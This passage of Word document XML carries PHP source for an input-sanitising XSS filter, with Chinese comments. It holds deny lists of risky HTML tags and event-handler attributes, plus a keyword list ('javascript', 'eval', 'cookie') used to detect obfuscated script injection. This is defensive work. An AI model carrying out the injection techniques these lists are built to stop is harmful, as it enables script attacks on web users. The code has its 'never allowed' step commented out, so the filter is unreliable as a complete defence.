    <w:p w14:paraId="1B66A884" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B9629" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $this-&gt;evil_attributes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C844C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            'on\w+', 'xmlns', 'formaction', 'form', 'xlink:href', 'FSCommand', 'seekSegmentTime'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C5CE8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            //  ,'style' 排除过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D50F85" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="36C10F9F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27812A58" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="214234CF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        if ($is_image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F09D94" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            // 严格的过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D9E8F8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            $this-&gt;naughty_tags = array_merge($this-&gt;naughty_tags, array('iframe', 'video', 'embed', 'style'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB4066" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            $this-&gt;evil_attributes = array_merge($this-&gt;evil_attributes, array('style'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A723569" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            /*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A77EB5E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             * URL Decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D470D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB5F4B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             * Just in case stuff like this is submitted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB3821C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093390C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             * &lt;a href="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;Google&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B006922" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CE2D38" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             * Note: Use rawurldecode() so it does not remove plus signs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A99E74" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             * */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47308B34" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="2C59132C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            if (stripos($str, '%') !== false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70414B2F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE3FDD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3614C971" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680CAD1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                    $oldstr = $str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F19ACE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                    $str = rawurldecode($str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC935F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                    $str = preg_replace_callback('#%(?:\s*[0-9a-f]){2,}#i', [$this, '_urldecodespaces'], $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E88BE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1110A3B6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                while ($oldstr !== $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466549EC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                unset($oldstr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D1B42F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FA3390" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0A98CF8B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            /*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235EABC3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             * Convert character entities to ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F02E63" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76303792" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             * This permits our tests below to work reliably.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0D14E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             * We only convert entities that are within tags since</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFA7215" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             * these are the ones that will pose security problems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F753D1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">             */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5737A4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="48FE69B1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            // 不进行二次编码的xss过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63298058" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            $str = preg_replace_callback("/[^a-z0-9&gt;]+[a-z0-9]+=([\'\"]).*?\\1/si", array($this, '_convert_attribute'), $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2D9007" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            $str = preg_replace_callback('/&lt;\w+.*/si', array($this, '_decode_entity'), $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB3123" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F98E853" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="3815A579" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="3179ED52" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Remove Invisible Characters Again!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D923EE1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = remove_invisible_characters($str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E82FA47" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="61C86D01" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A98D3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Convert all tabs to spaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E95D235" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AE2941" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * This prevents strings like this: ja</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>vascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2871489B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * NOTE: we deal with spaces between characters later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB194F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * NOTE: preg_replace was found to be amazingly slow here on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6806AB9C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * large blocks of data, so we use str_replace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F27D8D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC76A0F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = str_replace("\t", ' ', $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3C8123" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="383304B1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Capture converted string for later comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847C036" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$converted_string = $str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A59D27" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="538AAA39" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Remove Strings that are never allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B12A5F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//$str = $this-&gt;_do_never_allowed($str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB333EF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="31DC4539" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5856AC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Makes PHP tags safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0202D0" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A32C8D8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Note: XML tags are inadvertently replaced too:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294FD3CC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767CFDF7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * &lt;?xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3427EA29" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F036E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * But it doesn't seem to pose a problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44437950" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B91D0B2" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($is_image)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54002650" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CAA966" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Images have a tendency to have the PHP short opening and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD17BD5" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// closing tags every so often so we skip those and only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388862AF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// do the long opening tags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633EB847" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = preg_replace('/&lt;\?(php)/i', '&amp;lt;?\\1', $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78305A6D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7209F13E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278DC3A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A5448E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = str_replace(['&lt;?', '?'.'&gt;'], ['&amp;lt;?', '?&amp;gt;'], $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C43F139" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A0F5F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="1C7C6623" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B671026" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Compact any exploded words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE36DED" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFCFB23" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * This corrects words like:  j a v a s c r i p t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B1FB2" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * These words are compacted back to their correct state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693BA90F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D18389" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$words = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AFE580" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            'javascript', 'expression', 'vbscript', 'jscript', 'wscript',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27044B53" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            'vbs', 'script', 'base64', 'applet', 'alert', 'document',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACA7150" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            'write', 'cookie', 'window', 'confirm', 'prompt', 'eval'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7369F2CF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294ED01" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="6655184D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>foreach ($words as $word)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6992331D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BFC404" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$word = implode('\s*', str_split($word)).'\s*';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF972E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="39E7B5B9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// We only want to do this when it is followed by a non-word character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09335746" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// That way valid stuff like "dealer to" does not become "dealerto"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7BC79" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = preg_replace_callback('#('.substr($word, 0, -3).')(\W)#is', array($this, '_compact_exploded_words'), $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF62F98" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018CB88F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0E90ED71" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F1B0F6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Remove disallowed Javascript in links or img tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1EB974" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * We used to do some version comparisons and use of stripos(),</w:t>
      </w:r>
    </w:p>
